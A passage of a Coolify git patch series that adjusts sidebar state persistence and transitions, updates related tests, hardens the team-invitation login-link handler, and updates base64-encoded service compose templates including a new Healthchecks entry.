             <a href="/" {{ wireNavigate() }} class="text-2xl font-bold tracking-tight dark:text-white hover:opacity-80 transition-opacity">Coolify</a>
@@ -130,7 +130,7 @@ class="px-1 py-0.5 text-xs font-semibold text-neutral-500 dark:text-neutral-400
             </button>
         </div>
     </div>
-    <div class="px-2 pt-2 pb-7 overflow-hidden motion-safe:transition-all motion-safe:duration-200 motion-safe:ease-out motion-reduce:transition-none" :class="collapsed && 'lg:px-0 lg:pt-0 lg:pb-4 lg:min-h-8 lg:flex lg:justify-center'">
+    <div class="px-2 pt-2 pb-7 overflow-hidden" :class="collapsed && 'lg:px-0 lg:pt-0 lg:pb-4 lg:min-h-8 lg:flex lg:justify-center'">
         <livewire:switch-team />
     </div>
     <ul role="list" class="flex flex-col flex-1 gap-y-7">
diff --git a/resources/views/layouts/app.blade.php b/resources/views/layouts/app.blade.php
index 1171c2b19..6be40f966 100644
--- a/resources/views/layouts/app.blade.php
+++ b/resources/views/layouts/app.blade.php
@@ -9,15 +9,19 @@
     @auth
         <div x-data="{
             open: false,
-            collapsed: false,
-            pageWidth: 'full',
+            collapsed: localStorage.getItem('sidebarCollapsed') === 'true',
+            pageWidth: localStorage.getItem('pageWidth') || 'full',
+            sidebarReady: false,
             init() {
-                this.pageWidth = localStorage.getItem('pageWidth');
-                if (!this.pageWidth) {
-                    this.pageWidth = 'full';
-                    localStorage.setItem('pageWidth', 'full');
+                if (!localStorage.getItem('pageWidth')) {
+                    localStorage.setItem('pageWidth', this.pageWidth);
                 }
-                this.collapsed = localStorage.getItem('sidebarCollapsed') === 'true';
+
+                this.$nextTick(() => {
+                    requestAnimationFrame(() => {
+                        this.sidebarReady = true;
+                    });
+                });
             },
             toggleSidebar() {
                 this.collapsed = !this.collapsed;
@@ -47,8 +51,8 @@
                 </div>
             </div>
 
-            <div class="hidden lg:fixed lg:inset-y-0 lg:z-50 lg:flex lg:flex-col min-w-0 transition-[width] duration-200"
-                :class="collapsed ? 'lg:w-16' : 'lg:w-56'">
+            <div class="hidden lg:fixed lg:inset-y-0 lg:z-50 lg:flex lg:flex-col min-w-0"
+                :class="[collapsed ? 'lg:w-16' : 'lg:w-56', sidebarReady ? 'transition-[width] duration-200' : '']">
                 <div class="flex flex-col overflow-y-auto grow gap-y-5 scrollbar min-w-0">
                     <x-navbar />
                 </div>
@@ -79,7 +83,7 @@ class="text-xl font-bold tracking-wide dark:text-white hover:opacity-80 transiti
                 </button>
             </div>
 
-            <main class="transition-[padding] duration-200 p-6" :class="collapsed ? 'lg:pl-[6rem]' : 'lg:pl-[16rem]'">
+            <main class="p-6" :class="[collapsed ? 'lg:pl-[6rem]' : 'lg:pl-[16rem]', sidebarReady ? 'transition-[padding] duration-200' : '']">
                     {{ $slot }}
             </main>
         </div>
diff --git a/tests/Feature/ApplicationSeederTest.php b/tests/Feature/ApplicationSeederTest.php
index ac39ea4a7..f9c59f7a5 100644
--- a/tests/Feature/ApplicationSeederTest.php
+++ b/tests/Feature/ApplicationSeederTest.php
@@ -13,7 +13,7 @@
 
 uses(RefreshDatabase::class);
 
-it('seeds a railpack nodejs fastify example alongside the existing nixpacks example', function () {
+it('seeds the default applications without railpack examples', function () {
     $this->seed([
         UserSeeder::class,
         TeamSeeder::class,
@@ -26,7 +26,6 @@
     ]);
 
     $nixpacksExample = Application::where('uuid', 'nodejs')->first();
-    $railpackExample = Application::where('uuid', 'railpack-nodejs')->first();
 
     expect($nixpacksExample)
         ->not->toBeNull()
@@ -35,17 +34,6 @@
         ->and($nixpacksExample->base_directory)->toBe('/nodejs')
         ->and($nixpacksExample->ports_exposes)->toBe('3000');
 
-    expect($railpackExample)
-        ->not->toBeNull()
-        ->and($railpackExample->name)->toBe('Railpack NodeJS Fastify Example')
-        ->and($railpackExample->fqdn)->toBe('http://railpack-nodejs.127.0.0.1.sslip.io')
-        ->and($railpackExample->repository_project_id)->toBe(603035348)
-        ->and($railpackExample->git_repository)->toBe('coollabsio/coolify-examples')
-        ->and($railpackExample->git_branch)->toBe('v4.x')
-        ->and($railpackExample->base_directory)->toBe('/nodejs')
-        ->and($railpackExample->build_pack)->toBe('railpack')
-        ->and($railpackExample->ports_exposes)->toBe('3000')
-        ->and($railpackExample->environment_id)->toBe(1)
-        ->and($railpackExample->destination_id)->toBe(0)
-        ->and($railpackExample->source_id)->toBe(1);
+    expect(Application::query()->where('build_pack', 'railpack')->exists())->toBeFalse();
+    expect(Application::query()->whereIn('uuid', ['railpack-nodejs', 'railpack-static'])->exists())->toBeFalse();
 });
diff --git a/tests/Feature/SidebarNavigationMarkupTest.php b/tests/Feature/SidebarNavigationMarkupTest.php
new file mode 100644
index 000000000..5e8ffe58f
--- /dev/null
+++ b/tests/Feature/SidebarNavigationMarkupTest.php
@@ -0,0 +1,19 @@
+<?php
+
+it('initializes persisted sidebar state before enabling layout transitions', function () {
+    $layout = file_get_contents(resource_path('views/layouts/app.blade.php'));
+
+    expect($layout)
+        ->toContain("collapsed: localStorage.getItem('sidebarCollapsed') === 'true'")
+        ->toContain('sidebarReady: false')
+        ->toContain(":class=\"[collapsed ? 'lg:w-16' : 'lg:w-56', sidebarReady ? 'transition-[width] duration-200' : '']\"")
+        ->toContain(":class=\"[collapsed ? 'lg:pl-[6rem]' : 'lg:pl-[16rem]', sidebarReady ? 'transition-[padding] duration-200' : '']\"");
+});
+
+it('does not animate navbar padding when restoring collapsed state', function () {
+    $navbar = file_get_contents(resource_path('views/components/navbar.blade.php'));
+
+    expect($navbar)
+        ->not->toContain('items-start gap-3 motion-safe:transition-all')
+        ->not->toContain('overflow-hidden motion-safe:transition-all');
+});

From 40d570f19538a23edd66e8f752867b88d65a0907 Mon Sep 17 00:00:00 2001
From: Andras Bacsai <5845193+andrasbacsai@users.noreply.github.com>
Date: Tue, 2 Jun 2026 12:22:27 +0200
Subject: [PATCH 76/90] chore: update team invitation handling

---
 app/Http/Controllers/Controller.php           |  37 ++++--
 templates/service-templates-latest.json       |  22 +++-
 templates/service-templates.json              |  22 +++-
 tests/Feature/InvitationLinkHandlingTest.php  | 109 ++++++++++++++++++
 .../LinkLoginEmailVerificationTest.php        |  25 +++-
 5 files changed, 200 insertions(+), 15 deletions(-)
 create mode 100644 tests/Feature/InvitationLinkHandlingTest.php

diff --git a/app/Http/Controllers/Controller.php b/app/Http/Controllers/Controller.php
index 6ce6b6d57..03f7d6dae 100644
--- a/app/Http/Controllers/Controller.php
+++ b/app/Http/Controllers/Controller.php
@@ -7,6 +7,7 @@
 use App\Models\User;
 use App\Providers\RouteServiceProvider;
 use Illuminate\Auth\Events\Verified;
+use Illuminate\Contracts\Encryption\DecryptException;
 use Illuminate\Foundation\Auth\Access\AuthorizesRequests;
 use Illuminate\Foundation\Validation\ValidatesRequests;
 use Illuminate\Http\Request;
@@ -98,23 +99,39 @@ public function link()
     {
         $token = request()->get('token');
         if ($token) {
-            $decrypted = Crypt::decryptString($token);
-            $email = str($decrypted)->before('@@@');
-            $password = str($decrypted)->after('@@@');
+            try {
+                $decrypted = Crypt::decryptString($token);
+            } catch (DecryptException) {
+                return redirect()->route('login')->with('error', 'Invalid credentials.');
+            }
+
+            if (! str_contains($decrypted, '@@@')) {
+                return redirect()->route('login')->with('error', 'Invalid credentials.');
+            }
+
+            [$email, $password] = explode('@@@', $decrypted, 2);
+            $email = Str::lower($email);
             $user = User::whereEmail($email)->first();
             if (! $user) {
                 return redirect()->route('login');
             }
+
+            $invitation = TeamInvitation::whereEmail($email)->first();
+            if (! $invitation || ! $invitation->isValid()) {
+                return redirect()->route('login')->with('error', 'Invitation has expired or been revoked.');
+            }
+
             if (Hash::check($password, $user->password)) {
-                $invitation = TeamInvitation::whereEmail($email);
-                if ($invitation->exists()) {
-                    $team = $invitation->first()->team;
-                    $user->teams()->attach($team->id, ['role' => $invitation->first()->role]);
-                    $invitation->delete();
-                } else {
-                    $team = $user->teams()->first();
+                $team = $invitation->team;
+                if (! $user->teams()->where('team_id', $team->id)->exists()) {
+                    $user->teams()->attach($team->id, ['role' => $invitation->role]);
                 }
+                $invitation->delete();
+
                 Auth::login($user);
+                $user->forceFill([
+                    'password' => Hash::make(Str::random(64)),
+                ])->save();
                 session(['currentTeam' => $team]);
 
                 return redirect()->route('dashboard');
diff --git a/templates/service-templates-latest.json b/templates/service-templates-latest.json
index d1fb5e387..92685d8bf 100644
--- a/templates/service-templates-latest.json
+++ b/templates/service-templates-latest.json
@@ -1620,7 +1620,7 @@
     "garage": {
         "documentation": "https://garagehq.deuxfleurs.fr/documentation/?utm_source=coolify.io",
         "slogan": "Garage is an S3-compatible distributed object storage service designed for self-hosting.",
-        "compose": "c2VydmljZXM6CiAgZ2FyYWdlOgogICAgaW1hZ2U6ICdkeGZscnMvZ2FyYWdlOnYyLjEuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIEdBUkFHRV9TM19BUElfVVJMPSRHQVJBR0VfUzNfQVBJX1VSTAogICAgICAtIEdBUkFHRV9XRUJfVVJMPSRHQVJBR0VfV0VCX1VSTAogICAgICAtIEdBUkFHRV9BRE1JTl9VUkw9JEdBUkFHRV9BRE1JTl9VUkwKICAgICAgLSAnR0FSQUdFX1JQQ19TRUNSRVQ9JHtTRVJWSUNFX0hFWF8zMl9SUENTRUNSRVR9JwogICAgICAtIEdBUkFHRV9BRE1JTl9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0UKICAgICAgLSBHQVJBR0VfTUVUUklDU19UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0VNRVRSSUNTCiAgICAgIC0gR0FSQUdFX0FMTE9XX1dPUkxEX1JFQURBQkxFX1NFQ1JFVFM9dHJ1ZQogICAgICAtICdSVVNUX0xPRz0ke1JVU1RfTE9HOi1nYXJhZ2U9aW5mb30nCiAgICB2b2x1bWVzOgogICAgICAtICdnYXJhZ2UtbWV0YTovdmFyL2xpYi9nYXJhZ2UvbWV0YScKICAgICAgLSAnZ2FyYWdlLWRhdGE6L3Zhci9saWIvZ2FyYWdlL2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2dhcmFnZS50b21sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2dhcmFnZS50b21sCiAgICAgICAgY29udGVudDogIm1ldGFkYXRhX2RpciA9IFwiL3Zhci9saWIvZ2FyYWdlL21ldGFcIlxuZGF0YV9kaXIgPSBcIi92YXIvbGliL2dhcmFnZS9kYXRhXCJcbmRiX2VuZ2luZSA9IFwibG1kYlwiXG5cbnJlcGxpY2F0aW9uX2ZhY3RvciA9IDFcbmNvbnNpc3RlbmN5X21vZGUgPSBcImNvbnNpc3RlbnRcIlxuXG5jb21wcmVzc2lvbl9sZXZlbCA9IDFcbmJsb2NrX3NpemUgPSBcIjFNXCJcblxucnBjX2JpbmRfYWRkciA9IFwiWzo6XTozOTAxXCJcbnJwY19zZWNyZXRfZmlsZSA9IFwiZW52OkdBUkFHRV9SUENfU0VDUkVUXCJcbmJvb3RzdHJhcF9wZWVycyA9IFtdXG5cbltzM19hcGldXG5zM19yZWdpb24gPSBcImdhcmFnZVwiXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDBcIlxucm9vdF9kb21haW4gPSBcIi5zMy5nYXJhZ2UubG9jYWxob3N0XCJcblxuW3MzX3dlYl1cbmJpbmRfYWRkciA9IFwiWzo6XTozOTAyXCJcbnJvb3RfZG9tYWluID0gXCIud2ViLmdhcmFnZS5sb2NhbGhvc3RcIlxuXG5bYWRtaW5dXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDNcIlxuYWRtaW5fdG9rZW5fZmlsZSA9IFwiZW52OkdBUkFHRV9BRE1JTl9UT0tFTlwiXG5tZXRyaWNzX3Rva2VuX2ZpbGUgPSBcImVudjpHQVJBR0VfTUVUUklDU19UT0tFTlwiIgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9nYXJhZ2UKICAgICAgICAtIHN0YXRzCiAgICAgICAgLSAnLWEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQo=",
+        "compose": "c2VydmljZXM6CiAgZ2FyYWdlOgogICAgaW1hZ2U6ICdkeGZscnMvZ2FyYWdlOnYyLjEuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIEdBUkFHRV9TM19BUElfVVJMPSRHQVJBR0VfUzNfQVBJX1VSTAogICAgICAtIEdBUkFHRV9XRUJfVVJMPSRHQVJBR0VfV0VCX1VSTAogICAgICAtIEdBUkFHRV9BRE1JTl9VUkw9JEdBUkFHRV9BRE1JTl9VUkwKICAgICAgLSAnR0FSQUdFX1JQQ19TRUNSRVQ9JHtTRVJWSUNFX0hFWF82NF9SUENTRUNSRVR9JwogICAgICAtIEdBUkFHRV9BRE1JTl9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0UKICAgICAgLSBHQVJBR0VfTUVUUklDU19UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0VNRVRSSUNTCiAgICAgIC0gR0FSQUdFX0FMTE9XX1dPUkxEX1JFQURBQkxFX1NFQ1JFVFM9dHJ1ZQogICAgICAtICdSVVNUX0xPRz0ke1JVU1RfTE9HOi1nYXJhZ2U9aW5mb30nCiAgICB2b2x1bWVzOgogICAgICAtICdnYXJhZ2UtbWV0YTovdmFyL2xpYi9nYXJhZ2UvbWV0YScKICAgICAgLSAnZ2FyYWdlLWRhdGE6L3Zhci9saWIvZ2FyYWdlL2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2dhcmFnZS50b21sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2dhcmFnZS50b21sCiAgICAgICAgY29udGVudDogIm1ldGFkYXRhX2RpciA9IFwiL3Zhci9saWIvZ2FyYWdlL21ldGFcIlxuZGF0YV9kaXIgPSBcIi92YXIvbGliL2dhcmFnZS9kYXRhXCJcbmRiX2VuZ2luZSA9IFwibG1kYlwiXG5cbnJlcGxpY2F0aW9uX2ZhY3RvciA9IDFcbmNvbnNpc3RlbmN5X21vZGUgPSBcImNvbnNpc3RlbnRcIlxuXG5jb21wcmVzc2lvbl9sZXZlbCA9IDFcbmJsb2NrX3NpemUgPSBcIjFNXCJcblxucnBjX2JpbmRfYWRkciA9IFwiWzo6XTozOTAxXCJcbnJwY19zZWNyZXRfZmlsZSA9IFwiZW52OkdBUkFHRV9SUENfU0VDUkVUXCJcbmJvb3RzdHJhcF9wZWVycyA9IFtdXG5cbltzM19hcGldXG5zM19yZWdpb24gPSBcImdhcmFnZVwiXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDBcIlxucm9vdF9kb21haW4gPSBcIi5zMy5nYXJhZ2UubG9jYWxob3N0XCJcblxuW3MzX3dlYl1cbmJpbmRfYWRkciA9IFwiWzo6XTozOTAyXCJcbnJvb3RfZG9tYWluID0gXCIud2ViLmdhcmFnZS5sb2NhbGhvc3RcIlxuXG5bYWRtaW5dXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDNcIlxuYWRtaW5fdG9rZW5fZmlsZSA9IFwiZW52OkdBUkFHRV9BRE1JTl9UT0tFTlwiXG5tZXRyaWNzX3Rva2VuX2ZpbGUgPSBcImVudjpHQVJBR0VfTUVUUklDU19UT0tFTlwiIgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9nYXJhZ2UKICAgICAgICAtIHN0YXRzCiAgICAgICAgLSAnLWEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQo=",
         "tags": [
             "object",
             "storage",
@@ -1666,7 +1666,7 @@
     "gitea-runner": {
         "documentation": "https://github.com/go-gitea/gitea?utm_source=coolify.io",
         "slogan": "Gitea Actions runner for docker",
-        "compose": "c2VydmljZXM6CiAgcnVubmVyOgogICAgaW1hZ2U6ICdkb2NrZXIuaW8vZ2l0ZWEvcnVubmVyOjEuMC42JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0dJVEVBX0lOU1RBTkNFX1VSTD0ke0dJVEVBX0lOU1RBTkNFX1VSTH0nCiAgICAgIC0gJ0dJVEVBX1JVTk5FUl9SRUdJU1RSQVRJT05fVE9LRU49JHtHSVRFQV9SVU5ORVJfUkVHSVNUUkFUSU9OX1RPS0VOfScKICAgICAgLSAnR0lURUFfUlVOTkVSX05BTUU9JHtHSVRFQV9SVU5ORVJfTkFNRTotZ2l0ZWEtcnVubmVyfScKICAgICAgLSAnR0lURUFfUlVOTkVSX0xBQkVMUz0ke0dJVEVBX1JVTk5FUl9MQUJFTFM6LXVidW50dS1sYXRlc3Q6ZG9ja2VyOi8vbm9kZToyMn0nCiAgICAgIC0gJ0dJVEVBX1RPS0VOPSR7R0lURUFfVE9LRU59JwogICAgd29ya2luZ19kaXI6IC9kYXRhCiAgICB2b2x1bWVzOgogICAgICAtICdydW5uZXItZGF0YTovZGF0YScKICAgICAgLSAnL3Zhci9ydW4vZG9ja2VyLnNvY2s6L3Zhci9ydW4vZG9ja2VyLnNvY2snCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gInBzIGF1eCB8IGdyZXAgJ1tSXXVubmVyJyA+IC9kZXYvbnVsbCB8fCBleGl0IDEiCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTUK",
+        "compose": "c2VydmljZXM6CiAgcnVubmVyOgogICAgaW1hZ2U6ICdkb2NrZXIuaW8vZ2l0ZWEvcnVubmVyOjEuMC43JwogICAgZW52aXJvbm1lbnQ6CiAgICAgIC0gJ0dJVEVBX0lOU1RBTkNFX1VSTD0ke0dJVEVBX0lOU1RBTkNFX1VSTH0nCiAgICAgIC0gJ0dJVEVBX1JVTk5FUl9SRUdJU1RSQVRJT05fVE9LRU49JHtHSVRFQV9SVU5ORVJfUkVHSVNUUkFUSU9OX1RPS0VOfScKICAgICAgLSAnR0lURUFfUlVOTkVSX05BTUU9JHtHSVRFQV9SVU5ORVJfTkFNRTotZ2l0ZWEtcnVubmVyfScKICAgICAgLSAnR0lURUFfUlVOTkVSX0xBQkVMUz0ke0dJVEVBX1JVTk5FUl9MQUJFTFM6LXVidW50dS1sYXRlc3Q6ZG9ja2VyOi8vbm9kZToyMn0nCiAgICAgIC0gJ0dJVEVBX1RPS0VOPSR7R0lURUFfVE9LRU59JwogICAgd29ya2luZ19kaXI6IC9kYXRhCiAgICB2b2x1bWVzOgogICAgICAtICdydW5uZXItZGF0YTovZGF0YScKICAgICAgLSAnL3Zhci9ydW4vZG9ja2VyLnNvY2s6L3Zhci9ydW4vZG9ja2VyLnNvY2snCiAgICBoZWFsdGhjaGVjazoKICAgICAgdGVzdDoKICAgICAgICAtIENNRC1TSEVMTAogICAgICAgIC0gInBzIGF1eCB8IGdyZXAgJ1tSXXVubmVyJyA+IC9kZXYvbnVsbCB8fCBleGl0IDEiCiAgICAgIGludGVydmFsOiA1cwogICAgICB0aW1lb3V0OiAxMHMKICAgICAgcmV0cmllczogMTUK",
         "tags": [
             "gitea",
             "actions",
@@ -2007,6 +2007,24 @@
         "minversion": "0.0.0",
         "port": "80"
     },
+    "healthchecks": {
+        "documentation": "https://healthchecks.io/docs?utm_source=coolify.io",
+        "slogan": "Healthchecks is a cron job monitoring service. It listens for HTTP requests and email messages from your cron jobs and scheduled tasks.",
+        "compose": "c2VydmljZXM6CiAgaGVhbHRoY2hlY2tzOgogICAgaW1hZ2U6ICdoZWFsdGhjaGVja3MvaGVhbHRoY2hlY2tzOnY0LjInCiAgICBjb250YWluZXJfbmFtZTogaGVhbHRoY2hlY2tzCiAgICBlbnZpcm9ubWVudDoKICAgICAgLSBTRVJWSUNFX1VSTF9IRUFMVEhDSEVDS1NfODAwMAogICAgICAtIERCPXNxbGl0ZQogICAgICAtIERCX05BTUU9L2RhdGEvaGMuc3FsaXRlCiAgICAgIC0gJ0FMTE9XRURfSE9TVFM9JHtBTExPV0VEX0hPU1RTOi0qfScKICAgICAgLSAnUkVHSVNUUkFUSU9OX09QRU49JHtSRUdJU1RSQVRJT05fT1BFTjotVHJ1ZX0nCiAgICAgIC0gJ0RFQlVHPSR7REVCVUc6LUZhbHNlfScKICAgICAgLSAnU0VDUkVUX0tFWT0ke1NFQ1JFVF9LRVk6PyR7U0VSVklDRV9QQVNTV09SRF82NF9IRUFMVEhDSEVDS1N9fScKICAgICAgLSAnU0lURV9ST09UPSR7U0VSVklDRV9VUkxfSEVBTFRIQ0hFQ0tTfScKICAgICAgLSAnREVGQVVMVF9GUk9NX0VNQUlMPSR7REVGQVVMVF9GUk9NX0VNQUlMOi1maXhtZS1lbWFpbC1hZGRyZXNzLWhlcmV9JwogICAgICAtICdFTUFJTF9IT1NUPSR7RU1BSUxfSE9TVDotbXktc210cC1zZXJ2ZXItaGVyZS5jb219JwogICAgICAtICdFTUFJTF9QT1JUPSR7RU1BSUxfUE9SVDotNDY1fScKICAgICAgLSAnRU1BSUxfSE9TVF9VU0VSPSR7RU1BSUxfSE9TVF9VU0VSOi1teV91c2VybmFtZX0nCiAgICAgIC0gJ0VNQUlMX0hPU1RfUEFTU1dPUkQ9JHtFTUFJTF9IT1NUX1BBU1NXT1JEOi1teXBhc3N3b3JkfScKICAgICAgLSAnRU1BSUxfVVNFX1NTTD0ke0VNQUlMX1VTRV9TU0w6LVRydWV9JwogICAgICAtICdFTUFJTF9VU0VfVExTPSR7RU1BSUxfVVNFX1RMUzotRmFsc2V9JwogICAgdm9sdW1lczoKICAgICAgLSAnaGVhbHRoY2hlY2tzLWRhdGE6L2RhdGEnCg==",
+        "tags": [
+            "monitoring",
+            "status",
+            "performance",
+            "web",
+            "services",
+            "applications",
+            "real-time"
+        ],
+        "category": "monitoring",
+        "logo": "svgs/healthchecks.webp",
+        "minversion": "0.0.0",
+        "port": "80000"
+    },
     "heimdall": {
         "documentation": "https://github.com/linuxserver/Heimdall?utm_source=coolify.io",
         "slogan": "Heimdall is a dashboard for managing and organizing your server applications.",
diff --git a/templates/service-templates.json b/templates/service-templates.json
index 699b97e55..26aed5826 100644
--- a/templates/service-templates.json
+++ b/templates/service-templates.json
@@ -1620,7 +1620,7 @@
     "garage": {
         "documentation": "https://garagehq.deuxfleurs.fr/documentation/?utm_source=coolify.io",
         "slogan": "Garage is an S3-compatible distributed object storage service designed for self-hosting.",
-        "compose": "c2VydmljZXM6CiAgZ2FyYWdlOgogICAgaW1hZ2U6ICdkeGZscnMvZ2FyYWdlOnYyLjEuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIEdBUkFHRV9TM19BUElfVVJMPSRHQVJBR0VfUzNfQVBJX1VSTAogICAgICAtIEdBUkFHRV9XRUJfVVJMPSRHQVJBR0VfV0VCX1VSTAogICAgICAtIEdBUkFHRV9BRE1JTl9VUkw9JEdBUkFHRV9BRE1JTl9VUkwKICAgICAgLSAnR0FSQUdFX1JQQ19TRUNSRVQ9JHtTRVJWSUNFX0hFWF8zMl9SUENTRUNSRVR9JwogICAgICAtIEdBUkFHRV9BRE1JTl9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0UKICAgICAgLSBHQVJBR0VfTUVUUklDU19UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0VNRVRSSUNTCiAgICAgIC0gR0FSQUdFX0FMTE9XX1dPUkxEX1JFQURBQkxFX1NFQ1JFVFM9dHJ1ZQogICAgICAtICdSVVNUX0xPRz0ke1JVU1RfTE9HOi1nYXJhZ2U9aW5mb30nCiAgICB2b2x1bWVzOgogICAgICAtICdnYXJhZ2UtbWV0YTovdmFyL2xpYi9nYXJhZ2UvbWV0YScKICAgICAgLSAnZ2FyYWdlLWRhdGE6L3Zhci9saWIvZ2FyYWdlL2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2dhcmFnZS50b21sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2dhcmFnZS50b21sCiAgICAgICAgY29udGVudDogIm1ldGFkYXRhX2RpciA9IFwiL3Zhci9saWIvZ2FyYWdlL21ldGFcIlxuZGF0YV9kaXIgPSBcIi92YXIvbGliL2dhcmFnZS9kYXRhXCJcbmRiX2VuZ2luZSA9IFwibG1kYlwiXG5cbnJlcGxpY2F0aW9uX2ZhY3RvciA9IDFcbmNvbnNpc3RlbmN5X21vZGUgPSBcImNvbnNpc3RlbnRcIlxuXG5jb21wcmVzc2lvbl9sZXZlbCA9IDFcbmJsb2NrX3NpemUgPSBcIjFNXCJcblxucnBjX2JpbmRfYWRkciA9IFwiWzo6XTozOTAxXCJcbnJwY19zZWNyZXRfZmlsZSA9IFwiZW52OkdBUkFHRV9SUENfU0VDUkVUXCJcbmJvb3RzdHJhcF9wZWVycyA9IFtdXG5cbltzM19hcGldXG5zM19yZWdpb24gPSBcImdhcmFnZVwiXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDBcIlxucm9vdF9kb21haW4gPSBcIi5zMy5nYXJhZ2UubG9jYWxob3N0XCJcblxuW3MzX3dlYl1cbmJpbmRfYWRkciA9IFwiWzo6XTozOTAyXCJcbnJvb3RfZG9tYWluID0gXCIud2ViLmdhcmFnZS5sb2NhbGhvc3RcIlxuXG5bYWRtaW5dXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDNcIlxuYWRtaW5fdG9rZW5fZmlsZSA9IFwiZW52OkdBUkFHRV9BRE1JTl9UT0tFTlwiXG5tZXRyaWNzX3Rva2VuX2ZpbGUgPSBcImVudjpHQVJBR0VfTUVUUklDU19UT0tFTlwiIgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9nYXJhZ2UKICAgICAgICAtIHN0YXRzCiAgICAgICAgLSAnLWEnCiAgICAgIGludGVydmFsOiAxMHMKICAgICAgdGltZW91dDogNXMKICAgICAgcmV0cmllczogNQo=",
+        "compose": "c2VydmljZXM6CiAgZ2FyYWdlOgogICAgaW1hZ2U6ICdkeGZscnMvZ2FyYWdlOnYyLjEuMCcKICAgIGVudmlyb25tZW50OgogICAgICAtIEdBUkFHRV9TM19BUElfVVJMPSRHQVJBR0VfUzNfQVBJX1VSTAogICAgICAtIEdBUkFHRV9XRUJfVVJMPSRHQVJBR0VfV0VCX1VSTAogICAgICAtIEdBUkFHRV9BRE1JTl9VUkw9JEdBUkFHRV9BRE1JTl9VUkwKICAgICAgLSAnR0FSQUdFX1JQQ19TRUNSRVQ9JHtTRVJWSUNFX0hFWF82NF9SUENTRUNSRVR9JwogICAgICAtIEdBUkFHRV9BRE1JTl9UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0UKICAgICAgLSBHQVJBR0VfTUVUUklDU19UT0tFTj0kU0VSVklDRV9QQVNTV09SRF9HQVJBR0VNRVRSSUNTCiAgICAgIC0gR0FSQUdFX0FMTE9XX1dPUkxEX1JFQURBQkxFX1NFQ1JFVFM9dHJ1ZQogICAgICAtICdSVVNUX0xPRz0ke1JVU1RfTE9HOi1nYXJhZ2U9aW5mb30nCiAgICB2b2x1bWVzOgogICAgICAtICdnYXJhZ2UtbWV0YTovdmFyL2xpYi9nYXJhZ2UvbWV0YScKICAgICAgLSAnZ2FyYWdlLWRhdGE6L3Zhci9saWIvZ2FyYWdlL2RhdGEnCiAgICAgIC0KICAgICAgICB0eXBlOiBiaW5kCiAgICAgICAgc291cmNlOiAuL2dhcmFnZS50b21sCiAgICAgICAgdGFyZ2V0OiAvZXRjL2dhcmFnZS50b21sCiAgICAgICAgY29udGVudDogIm1ldGFkYXRhX2RpciA9IFwiL3Zhci9saWIvZ2FyYWdlL21ldGFcIlxuZGF0YV9kaXIgPSBcIi92YXIvbGliL2dhcmFnZS9kYXRhXCJcbmRiX2VuZ2luZSA9IFwibG1kYlwiXG5cbnJlcGxpY2F0aW9uX2ZhY3RvciA9IDFcbmNvbnNpc3RlbmN5X21vZGUgPSBcImNvbnNpc3RlbnRcIlxuXG5jb21wcmVzc2lvbl9sZXZlbCA9IDFcbmJsb2NrX3NpemUgPSBcIjFNXCJcblxucnBjX2JpbmRfYWRkciA9IFwiWzo6XTozOTAxXCJcbnJwY19zZWNyZXRfZmlsZSA9IFwiZW52OkdBUkFHRV9SUENfU0VDUkVUXCJcbmJvb3RzdHJhcF9wZWVycyA9IFtdXG5cbltzM19hcGldXG5zM19yZWdpb24gPSBcImdhcmFnZVwiXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDBcIlxucm9vdF9kb21haW4gPSBcIi5zMy5nYXJhZ2UubG9jYWxob3N0XCJcblxuW3MzX3dlYl1cbmJpbmRfYWRkciA9IFwiWzo6XTozOTAyXCJcbnJvb3RfZG9tYWluID0gXCIud2ViLmdhcmFnZS5sb2NhbGhvc3RcIlxuXG5bYWRtaW5dXG5hcGlfYmluZF9hZGRyID0gXCJbOjpdOjM5MDNcIlxuYWRtaW5fdG9rZW5fZmlsZSA9IFwiZW52OkdBUkFHRV9BRE1JTl9UT0tFTlwiXG5tZXRyaWNzX3Rva2VuX2ZpbGUgPSBcImVudjpHQVJBR0VfTUVUUklDU19UT0tFTlwiIgogICAgaGVhbHRoY2hlY2s6CiAgICAgIHRlc3Q6CiAgICAgICAgLSBDTUQKICAgICAgICAtIC9nYXJhZ2UKICAgICAgICAtIHN0YXRzCiAg